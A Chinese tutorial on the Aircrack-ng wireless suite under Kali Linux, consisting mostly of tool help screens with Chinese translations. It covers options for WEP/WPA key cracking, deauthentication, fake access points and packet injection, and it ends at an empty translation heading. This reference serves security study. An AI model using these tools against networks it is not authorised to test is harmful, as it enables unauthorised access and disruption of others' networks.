Kali-WIFI攻防(二)----无线网络分析工具Aircrack-ng

2024-06-17 05:58

本文主要是介绍Kali-WIFI攻防(二)----无线网络分析工具Aircrack-ng,希望对大家解决编程问题提供一定的参考价值,需要的开发者们随着小编来一起学习吧!

一、工具简介


Aircrack-ng是一个与802.11标准的无线网络分析有关的安全软件,主要功能有:网络侦测,数据包嗅探,WEP和WPA/WPA2-PSK破解,他可以恢复密钥一旦足够的数据包已被抓获,它实现了标准FMS攻击并提供一些优化像Korek攻击,以及全新的PTW攻击,从而更快地攻击比其他WEP破解工具。


Aircrack-ng是一个套件,在该套件中包括很多小工具,如下:


包名称
描述
aircrack-ng
破解WEP以及WPA(字典攻击)密钥
airdecap-ng
通过已知密钥来解密WEP或WPA嗅探数据
airmon-ng
将网卡设定为监听模式
aireplay-ng
数据包注入工具(Linux和Windows使用CommView驱动程序)
airodump-ng
数据包嗅探:将无线网络数据输送到PCAP或IVS文件并显示网络信息
airtun-ng
创建虚拟管道
airolib-ng
保存、管理ESSID密码列表
packetforge-ng
创建数据包注入用的加密包。
Tools
混合、转换工具
airbase-ng
软件模拟AP
airdecloak-ng
消除pcap文件中的WEP加密
airdriver-ng
无线设备驱动管理工具
airolib-ng
保存、管理ESSID密码列表,计算对应的密钥
airserv-ng
允许不同的进程访问无线网卡
buddy-ng
easside-ng的文件描述
easside-ng
和AP接入点通讯(无WEP)
tkiptun-ng
WPA/TKIP攻击
wesside-ng
自动破解WEP密钥

二、aircrack-ng工具包


1、airbase-ng – 配置假接入点




root@kali:~# airbase-ng --helpAirbase-ng 1.2 beta3 - (C) 2008-2013 Thomas d'OtreppeOriginal work: Martin Beckhttp://www.aircrack-ng.orgusage: airbase-ng <options> <replay interface>Options:-a bssid         : set Access Point MAC address-i iface         : capture packets from this interface-w WEP key       : use this WEP key to en-/decrypt packets-h MAC           : source mac for MITM mode-f disallow      : disallow specified client MACs (default: allow)-W 0|1           : [don't] set WEP flag in beacons 0|1 (default: auto)-q               : quiet (do not print statistics)-v               : verbose (print more messages)-A               : Ad-Hoc Mode (allows other clients to peer)-Y in|out|both   : external packet processing-c channel       : sets the channel the AP is running on-X               : hidden ESSID-s               : force shared key authentication (default: auto)-S               : set shared key challenge length (default: 128)-L               : Caffe-Latte WEP attack (use if driver can't send frags)-N               : cfrag WEP attack (recommended)-x nbpps         : number of packets per second (default: 100)-y               : disables responses to broadcast probes-0               : set all WPA,WEP,open tags. can't be used with -z & -Z-z type          : sets WPA1 tags. 1=WEP40 2=TKIP 3=WRAP 4=CCMP 5=WEP104-Z type          : same as -z, but for WPA2-V type          : fake EAPOL 1=MD5 2=SHA1 3=auto-F prefix        : write all sent and received frames into pcap file-P               : respond to all probes, even when specifying ESSIDs-I interval      : sets the beacon interval value in ms-C seconds       : enables beaconing of probed ESSID values (requires -P)Filter options:--bssid MAC      : BSSID to filter/use--bssids file    : read a list of BSSIDs out of that file--client MAC     : MAC of client to filter--clients file   : read a list of MACs out of that file--essid ESSID    : specify a single ESSID (default: default)--essids file    : read a list of ESSIDs out of that file--help           : Displays this usage screen


中文对照:

root@kali:~# airbase-ng --helpAirbase-ng 1.2 beta3 - (C) 2008-2013 Thomas d'OtreppeOriginal work: Martin Beckhttp://www.aircrack-ng.orgusage: airbase-ng <options> <replay interface>选项:-a bssid         : 设置接入点MAC地址-i iface         : 从该接口捕获数据包-w WEP key       : 使用此WEP密钥来对/解密数据包-h MAC           : 源MAC为MITM模式-f disallow      : 禁止指定的客户端MAC(默认值:allow)-W 0|1           : [don't] 在信标中设置WEP标志0 | 1(默认值:auto)-q               : 安静(不打印统计)-v               : 详细(打印更多信息)-A               : Ad-Hoc模式(允许其他客户端对等)-Y in|out|both   : 外部数据包处理-c channel       : 设置AP正在运行的通道-X               : 隐藏SSID-s               : 强制共享密钥验证(默认值:auto)-S               : 设置共享密钥挑战长度(默认值:128)-L               : Caffe-Latte WEP攻击(如果驱动程序无法发送碎片,则使用)-N               : cfrag WEP攻击(推荐)-x nbpps         : 每秒数据包数(默认值:100)-y               : 禁用对广播探测器的响应-0               : 设置所有WPA,WEP,打开标签。 不能与-z & -Z一起使用-z type          : 设置WPA1标签。 1 = WEP40 2 = TKIP 3 = WRAP 4 = CCMP 5 = WEP104-Z type          : 与-z相同,但对于WPA2-V type          : fake EAPOL 1=MD5 2=SHA1 3=auto-F prefix        : 将所有发送和接收的帧写入pcap文件-P               : 即使指定ESSID,也可以对所有探测器进行响应-I interval      : 设置信标间隔值,单位为ms-C seconds       : 使得探测到的ESSID值(需要-P)过滤选项:--bssid MAC      : BSSID过滤/使用--bssids file    : 读取该文件中的BSSID列表--client MAC     : MAC客户端进行过滤--clients file   : 从该文件中读取MAC列表--essid ESSID    : 指定单个ESSID(默认值:默认值)--essids file    : 从该文件中读取ESSID列表--help           : 显示帮助


2、aircrack-ng – 无线密码破解

root@kali:~# aircrack-ng --helpAircrack-ng 1.2 beta3 - (C) 2006-2013 Thomas d'Otreppehttp://www.aircrack-ng.orgusage: aircrack-ng [options] <.cap / .ivs file(s)>Common options:-a <amode> : force attack mode (1/WEP, 2/WPA-PSK)-e <essid> : target selection: network identifier-b <bssid> : target selection: access point's MAC-p <nbcpu> : # of CPU to use  (default: all CPUs)-q         : enable quiet mode (no status output)-C <macs>  : merge the given APs to a virtual one-l <file>  : write key to fileStatic WEP cracking options:-c         : search alpha-numeric characters only-t         : search binary coded decimal chr only-h         : search the numeric key for Fritz!BOX-d <mask>  : use masking of the key (A1:XX:CF:YY)-m <maddr> : MAC address to filter usable packets-n <nbits> : WEP key length :  64/128/152/256/512-i <index> : WEP key index (1 to 4), default: any-f <fudge> : bruteforce fudge factor,  default: 2-k <korek> : disable one attack method  (1 to 17)-x or -x0  : disable bruteforce for last keybytes-x1        : last keybyte bruteforcing  (default)-x2        : enable last  2 keybytes bruteforcing-X         : disable  bruteforce   multithreading-y         : experimental  single bruteforce mode-K         : use only old KoreK attacks (pre-PTW)-s         : show the key in ASCII while cracking-M <num>   : specify maximum number of IVs to use-D         : WEP decloak, skips broken keystreams-P <num>   : PTW debug:  1: disable Klein, 2: PTW-1         : run only 1 try to crack key with PTWWEP and WPA-PSK cracking options:-w <words> : path to wordlist(s) filename(s)WPA-PSK options:-E <file>  : create EWSA Project file v3-J <file>  : create Hashcat Capture file-S         : WPA cracking speed testOther options:-u         : Displays # of CPUs & MMX/SSE support--help     : Displays this usage screen


中文对照:

root@kali:~# aircrack-ng --helpAircrack-ng 1.2 beta3 - (C) 2006-2013 Thomas d'Otreppehttp://www.aircrack-ng.orgusage: aircrack-ng [options] <.cap / .ivs file(s)>常用选项:-a <amode> : 强力攻击模式 (1/WEP, 2/WPA-PSK)-e <essid> : 目标选择:网络标识符-b <bssid> : 目标选择:接入点的MAC-p <nbcpu> : # 使用的CPU  (默认: 所以CPU)-q         : 启用静音模式(无状态输出)-C <macs>  : 将给定的AP合并到一个虚拟的AP-l <file>  : 写入文件的密钥静态WEP破解选项:-c         : 仅搜索字母数字字符-t         : 仅搜索二进制编码的十进制chr-h         : search the numeric key for Fritz!BOX 搜索Fritz!BOX的数字键-d <mask>  : 使用键的掩码 (A1:XX:CF:YY)-m <maddr> : MAC地址过滤可用的数据包-n <nbits> : WEP密钥长度 :  64/128/152/256/512-i <index> : WEP密钥索引(1到4),默认值:any-f <fudge> : bruteforce fudge factor,  default: 2-k <korek> : 禁用一种攻击方法(1到17)-x or -x0  : disable bruteforce for last keybytes 禁用最后一个密钥串的bruteforce-x1        : 最后一个关键字节强制(默认)-x2        : 启用最后2个密码子 强制-X         : 禁用bruteforce多线程-y         : 实验单强制模式-K         : 只使用旧的KoreK攻击 (pre-PTW)-s         : 在打开时显示ASCII码的关键字-M <num>   : 指定最多使用的IV-D         : WEP decloak, skips broken keystreams WEP密钥序列的隐形,跳过了-P <num>   : PTW debug:  1: disable Klein, 2: PTW PTW调试:1:禁用Klein,2:PTW-1         : 只运行1次尝试用PTW破解密钥WEP和WPA-PSK破解选项:-w <words> : 路径表(S)的文件名(S)WPA-PSK选项:-E <file>  : 创建项目文件ewsa V3-J <file>  : 创建Hashcat捕获文件-S         : WPA破解速度测试其他选项:-u         : 显示CPU数量和MMX / SSE支持--help     : 显示帮助


3、airdecap-ng – 解密WEP/WPA/WPA2捕获文件

root@kali:~# airdecap-ng --helpAirdecap-ng 1.2 beta3 - (C) 2006-2013 Thomas d'Otreppehttp://www.aircrack-ng.orgusage: airdecap-ng [options] <pcap file>Common options:-l         : don't remove the 802.11 header-b <bssid> : access point MAC address filter-e <essid> : target network SSIDWEP specific option:-w <key>   : target network WEP key in hexWPA specific options:-p <pass>  : target network WPA passphrase-k <pmk>   : WPA Pairwise Master Key in hex--help     : Displays this usage screen


中文对照版:

root@kali:~# airdecap-ng --helpAirdecap-ng 1.2 beta3 - (C) 2006-2013 Thomas d'Otreppehttp://www.aircrack-ng.orgusage: airdecap-ng [options] <pcap file>常用选项:-l         : 不要删除802.11头-b <bssid> : 接入点MAC地址过滤器-e <essid> : 目标网络SSIDWEP具体选项:-w <key>   : 目标网络WEP密钥为十六进制WPA具体选项:-p <pass>  : 目标网络WPA密码-k <pmk>   : WPA成对主密钥为十六进制--help     : 显示帮助

4、airdecloak-ng – 从pcap文件中删除伪装

root@kali:~# airdecloak-ng --helpAirdecloak-ng 1.2 beta3 - (C) 2008-2013 Thomas d'Otreppehttp://www.aircrack-ng.orgusage: airdecloak-ng [options]options:Mandatory:-i <file>             : Input capture file--ssid <ESSID>        : ESSID of the network to filteror--bssid <BSSID>       : BSSID of the network to filterOptional:--filters <filters>   : Apply filters (separated by a comma). Filters:signal:               Try to filter based on signal.duplicate_sn:         Remove all duplicate sequence numbersfor both the AP and the client.duplicate_sn_ap:      Remove duplicate sequence number forthe AP only.duplicate_sn_client:  Remove duplicate sequence number for theclient only.consecutive_sn:       Filter based on the fact that IV shouldbe consecutive (only for AP).duplicate_iv:         Remove all duplicate IV.signal_dup_consec_sn: Use signal (if available), duplicate andconsecutive sequence number (filtering ismuch more precise than using all thesefilters one by one).--null-packets        : Assume that null packets can be cloaked.--disable-base_filter : Do not apply base filter.--drop-frag           : Drop fragmented packets--help                : Displays this usage screen


中文对照版:

root@kali:~# airdecloak-ng --helpAirdecloak-ng 1.2 beta3 - (C) 2008-2013 Thomas d'Otreppehttp://www.aircrack-ng.orgusage: airdecloak-ng [options]选项:强制性:-i <file>             : 输入捕获文件--ssid <ESSID>        : 网络的ESSID进行过滤or--bssid <BSSID>       : 要过滤网络的BSSID可选的:--filters <filters>   : 应用过滤器(用逗号分隔). 过滤器:signal:               尝试根据信号过滤.duplicate_sn:         删除AP和客户端的所有重复序列号。duplicate_sn_ap:      删除AP的重复序列号。duplicate_sn_client:  删除客户端的重复序列号。consecutive_sn:       基于这样的事实,IV应该是连续的(仅适用于AP)过滤器。duplicate_iv:         删除所有重复的IV。signal_dup_consec_sn: 使用信号(如果可用),重复和连续的序列号(过滤比使用所有这些过滤器更加精确得多)。--null-packets        : 假设空数据包可以隐藏.--disable-base_filter : 不要使用基础过滤器。--drop-frag           : 丢弃分片包--help                : 显示帮助


5、airdriver-ng – 提供有关系统上无线驱动程序的状态信息

root@kali:~# airdriver-ng --help
Found kernel: 3.3.12-kali1-686-pae.3.12-kali1-686-pae
usage: airdriver-ng <command> [drivernumber]valid commands:supported       - lists all supported driverskernel          - lists all in-kernel driversinstalled       - lists all installed driversloaded          - lists all loaded drivers-----------------------------------------------------insert <drivernum>  - inserts a driverload <drivernum>    - loads a driverunload <drivernum>  - unloads a driverreload <drivernum>  - reloads a driver-----------------------------------------------------compile <drivernum> - compiles a driverinstall <drivernum> - installs a driverremove <drivernum>  - removes a driver-----------------------------------------------------compile_stack <stacknum>    - compiles a stackinstall_stack <stacknum>    - installs a stackremove_stack <stacknum> - removes a stack-----------------------------------------------------install_firmware <drivernum>    - installs the firmwareremove_firmware <drivernum> - removes the firmware-----------------------------------------------------details <drivernum> - prints driver detailsdetect          - detects wireless cards


中文对照版:

root@kali:~# airdriver-ng --help
Found kernel: 3.3.12-kali1-686-pae.3.12-kali1-686-pae
usage: airdriver-ng <command> [drivernumber]
有效命令:supported       - 列出所有支持的驱动程序kernel          - 列出所有内核驱动程序installed       - 列出所有已安装的驱动程序loaded          - 列出所有加载的驱动程序-----------------------------------------------------insert <drivernum>  - 插入驱动程序load <drivernum>    - 加载驱动程序unload <drivernum>  - 卸载驱动程序reload <drivernum>  - 重新加载驱动程序-----------------------------------------------------compile <drivernum> - 编译驱动程序install <drivernum> - 安装驱动程序remove <drivernum>  - 删除驱动程序-----------------------------------------------------compile_stack <stacknum>    - 编译一个堆栈install_stack <stacknum>    - 安装一个堆栈remove_stack <stacknum> - 删除堆栈-----------------------------------------------------install_firmware <drivernum>    - 安装固件remove_firmware <drivernum> - 删除固件-----------------------------------------------------details <drivernum> - 打印驱动程序详细信息detect          - 检测无线网卡


6、aireplay-ng – 主要功能是产生流量以供以后在aircrack-ng中使用

root@kali:~# aireplay-ng --helpAireplay-ng 1.2 beta3 - (C) 2006-2013 Thomas d'Otreppehttp://www.aircrack-ng.orgusage: aireplay-ng <options> <replay interface>Filter options:-b bssid  : MAC address, Access Point-d dmac   : MAC address, Destination-s smac   : MAC address, Source-m len    : minimum packet length-n len    : maximum packet length-u type   : frame control, type    field-v subt   : frame control, subtype field-t tods   : frame control, To      DS bit-f fromds : frame control, From    DS bit-w iswep  : frame control, WEP     bit-D        : disable AP detectionReplay options:-x nbpps  : number of packets per second-p fctrl  : set frame control word (hex)-a bssid  : set Access Point MAC address-c dmac   : set Destination  MAC address-h smac   : set Source       MAC address-g value  : change ring buffer size (default: 8)-F        : choose first matching packetFakeauth attack options:-e essid  : set target AP SSID-o npckts : number of packets per burst (0=auto, default: 1)-q sec    : seconds between keep-alives-Q        : send reassociation requests-y prga   : keystream for shared key auth-T n      : exit after retry fake auth request n timeArp Replay attack options:-j        : inject FromDS packetsFragmentation attack options:-k IP     : set destination IP in fragments-l IP     : set source IP in fragmentsTest attack options:-B        : activates the bitrate testSource options:-i iface  : capture packets from this interface-r file   : extract packets from this pcap fileMiscellaneous options:-R                    : disable /dev/rtc usage--ignore-negative-one : if the interface's channel can't be determined,ignore the mismatch, needed for unpatched cfg80211Attack modes (numbers can still be used):--deauth      count : deauthenticate 1 or all stations (-0)--fakeauth    delay : fake authentication with AP (-1)--interactive       : interactive frame selection (-2)--arpreplay         : standard ARP-request replay (-3)--chopchop          : decrypt/chopchop WEP packet (-4)--fragment          : generates valid keystream   (-5)--caffe-latte       : query a client for new IVs  (-6)--cfrag             : fragments against a client  (-7)--migmode           : attacks WPA migration mode  (-8)--test              : tests injection and quality (-9)--help              : Displays this usage screen


中文对照版:

root@kali:~# aireplay-ng --helpAireplay-ng 1.2 beta3 - (C) 2006-2013 Thomas d'Otreppehttp://www.aircrack-ng.orgusage: aireplay-ng <options> <replay interface>过滤选项:-b bssid  : MAC地址,接入点-d dmac   : MAC地址,目的地址-s smac   : MAC地址,来源-m len    : 最小包长度-n len    : 最大包长度-u type   : 帧控制,类型字段-v subt   : 帧控制,子类型字段-t tods   : 帧控制,到DS位-f fromds : 帧控制,从DS位-w iswep  : 帧控制,WEP位-D        : 禁用AP检测重播选项:-x nbpps  : 每秒数据包数-p fctrl  : 设置帧控制字(十六进制)-a bssid  : 设置接入点MAC地址-c dmac   : 设置目的MAC地址-h smac   : 设置源MAC地址-g value  : 更改环缓冲区大小(默认值:8)-F        : 选择第一个匹配的数据包Fakeauth攻击选项:-e essid  : 设置目标AP SSID-o npckts : 每个突发数据包数 (0=auto, default: 1)-q sec    : 保持活力之间的秒数-Q        : 发送重新关联请求-y prga   : 共享密钥认证的密钥流-T n      : 在重试假验证请求后退出n次Arp Replay攻击选项:-j        : 注入FromDS数据包碎片攻击选项:-k IP     : 将目的IP设置为片段-l IP     : 将源IP设置为片段测试攻击选项:-B        : 激活比特率测试源选项:-i iface  : 从该接口捕获数据包-r file   : 从这个pcap文件中提取数据包杂项选项:-R                    : 禁用/ dev / rtc用法--ignore-negative-one : 如果界面的通道无法确定,请忽略未分配的cfg80211所需的不匹配攻击模式(仍可使用数字):--deauth      count : 取消认证1或所有电台      (-0)--fakeauth    delay : AP伪造认证	             (-1)--interactive       : 互动框架选择 	     (-2)--arpreplay         : 标准ARP请求重放 	     (-3)--chopchop          : 解密/ chopchop WEP数据包 (-4)--fragment          : 有效的密钥流generates    (-5)--caffe-latte       : 查询客户端的新IV  	     (-6)--cfrag             : 对客户端的碎片  	     (-7)--migmode           : 攻击WPA迁移模式  	     (-8)--test              : 测试注射和质量 	     (-9)--help              : 显示帮助


7、airmon-ng – 该脚本可用于在无线接口上启用监视器模式

root@kali:~# airmon-ng --helpusage: airmon-ng <start|stop|check> <interface> [channel or frequency]

8、airmon-zc – 该脚本可用于在无线接口上启用监视器模式

root@kali:~# airmon-zc --helpusage: airmon-zc <start|stop|check> <interface> [channel or frequency]



9、airodump-ng – 用于原始802.11帧的数据包捕获

root@kali:~# airodump-ng --helpAirodump-ng 1.2 beta3 - (C) 2006-2013 Thomas d'Otreppehttp://www.aircrack-ng.orgusage: airodump-ng <options> <interface>[,<interface>,...]Options:--ivs                 : Save only captured IVs--gpsd                : Use GPSd--write      <prefix> : Dump file prefix-w                    : same as --write--beacons             : Record all beacons in dump file--update       <secs> : Display update delay in seconds--showack             : Prints ack/cts/rts statistics-h                    : Hides known stations for --showack-f            <msecs> : Time in ms between hopping channels--berlin       <secs> : Time before removing the AP/clientfrom the screen when no more packetsare received (Default: 120 seconds)-r             <file> : Read packets from that file-x            <msecs> : Active Scanning Simulation--manufacturer        : Display manufacturer from IEEE OUI list--uptime              : Display AP Uptime from Beacon Timestamp--output-format<formats> : Output format. Possible values:pcap, ivs, csv, gps, kismet, netxml--ignore-negative-one : Removes the message that saysfixed channel <interface>: -1Filter options:--encrypt   <suite>   : Filter APs by cipher suite--netmask <netmask>   : Filter APs by mask--bssid     <bssid>   : Filter APs by BSSID--essid     <essid>   : Filter APs by ESSID-a                    : Filter unassociated clientsBy default, airodump-ng hop on 2.4GHz channels.You can make it capture on other/specific channel(s) by using:--channel <channels>  : Capture on specific channels--band <abg>          : Band on which airodump-ng should hop-C    <frequencies>   : Uses these frequencies in MHz to hop--cswitch  <method>   : Set channel switching method0       : FIFO (default)1       : Round Robin2       : Hop on last-s                    : same as --cswitch--help                : Displays this usage screen

中文对照版:

root@kali:~# airodump-ng --helpAirodump-ng 1.2 beta3 - (C) 2006-2013 Thomas d'Otreppehttp://www.aircrack-ng.orgusage: airodump-ng <options> <interface>[,<interface>,...]选项:--ivs                 : 只保存捕获的IV--gpsd                : 使用GPSd--write      <prefix> : 转储文件前缀-w                    : same as --write--beacons             : 在转储文件中记录所有信标--update       <secs> : 以秒为单位显示更新延迟--showack             : 打印ack / cts / rts统计-h                    : 隐藏已知的站点--showack-f            <msecs> : 跳频通道之间的时间(毫秒)--berlin       <secs> : 在没有收到更多数据包的情况下,从屏幕上删除AP /客户端之前的时间(默认值:120秒)-r             <file> : 从该文件读取数据包-x            <msecs> : 主动扫描模拟--manufacturer        : 显示器制造商从IEEE OUI列表--uptime              : 从信标时间戳显示AP正常运行时间--output-format<formats> : 输出格式.可能的值:pcap,ivs,csv,gps,kismet,netxml--ignore-negative-one : 删除固定通道<interface>:-1的消息Filter options:--encrypt   <suite>   : 通过加密套件过滤AP--netmask <netmask>   : 通过掩码过滤AP--bssid     <bssid>   : 通过BSSID过滤AP--essid     <essid>   : 通过ESSID过滤AP-a                    : 过滤未关联的客户端默认情况下,airodump-ng在2.4GHz频道上跳。您可以使用以下方式在其他/特定频道上进行捕获:--channel <channels>  : 在特定频道上捕获--band <abg>          : Band on which airodump-ng should hop-C    <frequencies>   : 以MHz为单位使用这些频率--cswitch  <method>   : 设置通道切换方式0       : FIFO (default)1       : Round Robin 轮回2       : Hop on last 最后跳-s                    : same as --cswitch--help                : 显示帮助



10、airodump-ng-oui-update – 下载并解析IEEE OUI列表


11、airolib-ng – 专门用于存储和管理essid和密码列表

root@kali:~# airolib-ng --helpAirolib-ng 1.2 beta3 - (C) 2007, 2008, 2009 ebfehttp://www.aircrack-ng.orgUsage: airolib-ng <database> <operation> [options]Operations:--stats        : Output information about the database.--sql <sql>    : Execute specified SQL statement.--clean [all]  : Clean the database from old junk. 'all' will alsoreduce filesize if possible and run an integrity check.--batch        : Start batch-processing all combinations of ESSIDsand passwords.--verify [all] : Verify a set of randomly chosen PMKs.If 'all' is given, all invalid PMK will be deleted.--import [essid|passwd] <file>   :Import a text file as a list of ESSIDs or passwords.--import cowpatty <file>         :Import a cowpatty file.--export cowpatty <essid> <file> :Export to a cowpatty file.

中文对照版:
root@kali:~# airolib-ng --helpAirolib-ng 1.2 beta3 - (C) 2007, 2008, 2009 ebfehttp://www.aircrack-ng.orgUsage: airolib-ng <database> <operation> [options]Operations:--stats        : 输出有关数据库的信息--sql <sql>    : 执行指定的SQL语句--clean [all]  : 从旧垃圾清理数据库.如果可能,'all' 也将减少文件大小,并执行完整性检查--batch        : 开始批处理所有ESSID和密码的组合--verify [all] : 验证一组随机选择的PMK.如果给出“全部”,则所有无效的PMK将被删除--import [essid|passwd] <file>   :导入文本文件作为ESSID或密码列表--import cowpatty <file>         :导入cowpatty文件--export cowpatty <essid> <file> :导出到一个cowpatty文件


12、airserv-ng – 无线网卡服务器
root@kali:~# airserv-ng --help
airserv-ng: invalid option -- '-'Airserv-ng 1.2 beta3 - (C) 2007, 2008, 2009 Andrea Bittauhttp://www.aircrack-ng.orgUsage: airserv-ng <options>Options:-h         : This help screen-p  <port> : TCP port to listen on (default:666)-d <iface> : Wifi interface to use-c  <chan> : Channel to use-v <level> : Debug level (1 to 3; default: 1)

中文对照版:
root@kali:~# airserv-ng --help
airserv-ng: invalid option -- '-'Airserv-ng 1.2 beta3 - (C) 2007, 2008, 2009 Andrea Bittauhttp://www.aircrack-ng.orgUsage: airserv-ng <options>选项:-h         : 这个帮助屏幕-p  <port> : TCP端口监听(默认值:666)-d <iface> : Wifi界面使用-c  <chan> : 频道使用-v <level> : 调试级别 (1 to 3; default: 1)


13、airtun-ng – 虚拟隧道接口创建者

root@kali:~# airtun-ng --helpAirtun-ng 1.2 beta3 - (C) 2006-2013 Thomas d'OtreppeOriginal work: Martin Beckhttp://www.aircrack-ng.orgusage: airtun-ng <options> <replay interface>-x nbpps         : number of packets per second (default: 100)-a bssid         : set Access Point MAC address: In WDS Mode this sets the Receiver-i iface         : capture packets from this interface-y file          : read PRGA from this file-w wepkey        : use this WEP-KEY to encrypt packets-t tods          : send frames to AP (1) or to client (0): or tunnel them into a WDS/Bridge (2)-r file          : read frames out of pcap fileWDS/Bridge Mode options:-s transmitter   : set Transmitter MAC address for WDS Mode-b               : bidirectional mode. This enables communication: in Transmitter's AND Receiver's networks.: Works only if you can see both stations.Repeater options:--repeat         : activates repeat mode--bssid <mac>    : BSSID to repeat--netmask <mask> : netmask for BSSID filter--help           : Displays this usage screen


中文对照版:

root@kali:~# airtun-ng --helpAirtun-ng 1.2 beta3 - (C) 2006-2013 Thomas d'OtreppeOriginal work: Martin Beckhttp://www.aircrack-ng.orgusage: airtun-ng <options> <replay interface>-x nbpps         : 每秒数据包数 (default: 100)-a bssid         : 设置接入点MAC地址: 在WDS模式下,这将设置接收器-i iface         : 从该接口捕获数据包-y file          : 从这个文件读取PRGA-w wepkey        : 使用此WEP-KEY加密数据包-t tods          : 向AP(1)或客户端(0)发送帧: 或将其隧道引入 WDS / Bridge(2)-r file          : 从pcap文件读取帧WDS / Bridge模式选项:-s transmitter   : 设置WDS模式的发送器MAC地址-b               : 双向模式,这使得能够进行通信: 在发射机和接收机的网络中: 只有当你能看到这两个电台时,才能工作中继器选项:--repeat         : 激活重复模式--bssid <mac>    : BSSID重复--netmask <mask> : 用于BSSID过滤器的网络掩码--help           : 显示帮助


14、besside-ng – 自动破解WEP和WPA网络

root@kali:~# besside-ng --help
besside-ng: invalid option -- '-'Besside-ng 1.2 beta3 - (C) 2010 Andrea Bittauhttp://www.aircrack-ng.orgUsage: besside-ng [options] <interface>Options:-b <victim mac> : Victim BSSID-s <WPA server> : Upload wpa.cap for cracking-c       <chan> : chanlock-p       <pps>  : flood rate-W              : WPA only-v              : verbose, -vv for more, etc.-h              : This help screen


中文对照版:

root@kali:~# besside-ng --help
besside-ng: invalid option -- '-'Besside-ng 1.2 beta3 - (C) 2010 Andrea Bittauhttp://www.aircrack-ng.orgUsage: besside-ng [options] <interface>选项:-b <victim mac> : 受害者BSSID-s <WPA server> : 上传wpa.cap破解-c       <chan> : chanlock-p       <pps>  : flood rate-W              : WPA only-v              : 详细的, -vv for more, etc.-h              : 显示帮助


15、buddy-ng

root@kali:~# buddy-ng -hBuddy-ng 1.2 beta3 - (C) 2007,2008 Andrea Bittauhttp://www.aircrack-ng.orgUsage: buddy-ng <options>Options:-h        : This help screen-p        : Don't drop privileges


中文对照版:

root@kali:~# buddy-ng -hBuddy-ng 1.2 beta3 - (C) 2007,2008 Andrea Bittauhttp://www.aircrack-ng.orgUsage: buddy-ng <options>选项:-h        : 显示帮助-p        : 不要删除权限


16、easside-ng  – 一种自动魔法工具,允许您通过WEP加密的接入点进行通信

root@kali:~# easside-ng -hEasside-ng 1.2 beta3 - (C) 2007, 2008, 2009 Andrea Bittauhttp://www.aircrack-ng.orgUsage: easside-ng <options>Options:-h                : This help screen-v   <victim mac> : Victim BSSID-m      <src mac> : Source MAC address-i           <ip> : Source IP address-r    <router ip> : Router IP address-s     <buddy ip> : Buddy-ng IP address (mandatory)-f        <iface> : Interface to use (mandatory)-c      <channel> : Lock card to this channel-n                : Determine Internet IP only


中文对照版:

root@kali:~# easside-ng -hEasside-ng 1.2 beta3 - (C) 2007, 2008, 2009 Andrea Bittauhttp://www.aircrack-ng.orgUsage: easside-ng <options>Options:-h                : 显示帮助-v   <victim mac> : 受害者BSSID-m      <src mac> : 源MAC地址-i           <ip> : 源IP地址-r    <router ip> : 路由器IP地址-s     <buddy ip> : 好友地址 (强制性)-f        <iface> : 使用界面 (强制性)-c      <channel> : 将卡锁定到此通道-n                : 仅确定Internet IP



17、ivstools – 这个工具句柄.ivs文件.您可以合并或转换它们。

root@kali:~# ivstoolsivsTools 1.2 beta3 - (C) 2006-2013 Thomas d'Otreppehttp://www.aircrack-ng.orgusage: ivstools --convert <pcap file> <ivs output file>Extract ivs from a pcap fileivstools --merge <ivs file 1> <ivs file 2> .. <output file>Merge ivs files


中文对照版:
root@kali:~# ivstoolsivsTools 1.2 beta3 - (C) 2006-2013 Thomas d'Otreppehttp://www.aircrack-ng.orgusage: ivstools --convert <pcap file> <ivs output file>从pcap文件中提取ivsivstools --merge <ivs file 1> <ivs file 2> .. <output file>合并ivs文件


18、kstats
root@kali:~# kstats
usage: kstats <ivs file> <104-bit key>


19、makeivs-ng – 生成初始化向量

root@kali:~# makeivs-ng --helpmakeivs-ng 1.2 beta3 - (C) 2006-2013 Thomas d'Otreppehttp://www.aircrack-ng.orgusage: makeivs-ng [options]Common options:-b <bssid> : Set access point MAC address-f <num>   : Number of first IV-k <key>   : Target network WEP key in hex-s <num>   : Seed used to setup random generator-w <file>  : Filename to write IVs into-c <num>   : Number of IVs to generate-d <num>   : Percentage of dupe IVs-e <num>   : Percentage of erroneous keystreams-l <num>   : Length of keystreams-n         : Ignores ignores weak IVs-p         : Uses prng algorithm to generate IVs--help     : Displays this usage screen

中文对照版:

root@kali:~# makeivs-ng --helpmakeivs-ng 1.2 beta3 - (C) 2006-2013 Thomas d'Otreppehttp://www.aircrack-ng.orgusage: makeivs-ng [options]常用选项:-b <bssid> : 设置接入点MAC地址-f <num>   : Number of first IV 第IV号-k <key>   : 目标网络WEP密钥为十六进制-s <num>   : 种子用于设置随机发生器-w <file>  : 将文件名写入-c <num>   : 产生的IV数-d <num>   : Percentage of dupe IVs 重复数据删除工具变量的百分比-e <num>   : 错误密钥流的百分比-l <num>   : 密钥流长度-n         : 忽略忽略弱IV-p         : 使用prng算法生成IV--help     : 显示帮助


20、packetforge-ng – 创建可随后用于注入的加密数据包
root@kali:~# packetforge-ng --helpPacketforge-ng 1.2 beta3 - (C) 2006-2013 Thomas d'OtreppeOriginal work: Martin Beckhttp://www.aircrack-ng.orgUsage: packetforge-ng <mode> <options>Forge options:-p <fctrl>     : set frame control word (hex)-a <bssid>     : set Access Point MAC address-c <dmac>      : set Destination  MAC address-h <smac>      : set Source       MAC address-j             : set FromDS bit-o             : clear ToDS bit-e             : disables WEP encryption-k <ip[:port]> : set Destination IP [Port]-l <ip[:port]> : set Source      IP [Port]-t ttl         : set Time To Live-w <file>      : write packet to this pcap file-s <size>      : specify size of null packet-n <packets>   : set number of packets to generateSource options:-r <file>      : read packet from this raw file-y <file>      : read PRGA from this fileModes:--arp          : forge an ARP packet    (-0)--udp          : forge an UDP packet    (-1)--icmp         : forge an ICMP packet   (-2)--null         : build a null packet    (-3)--custom       : build a custom packet  (-9)--help         : Displays this usage screen


中文对照版:

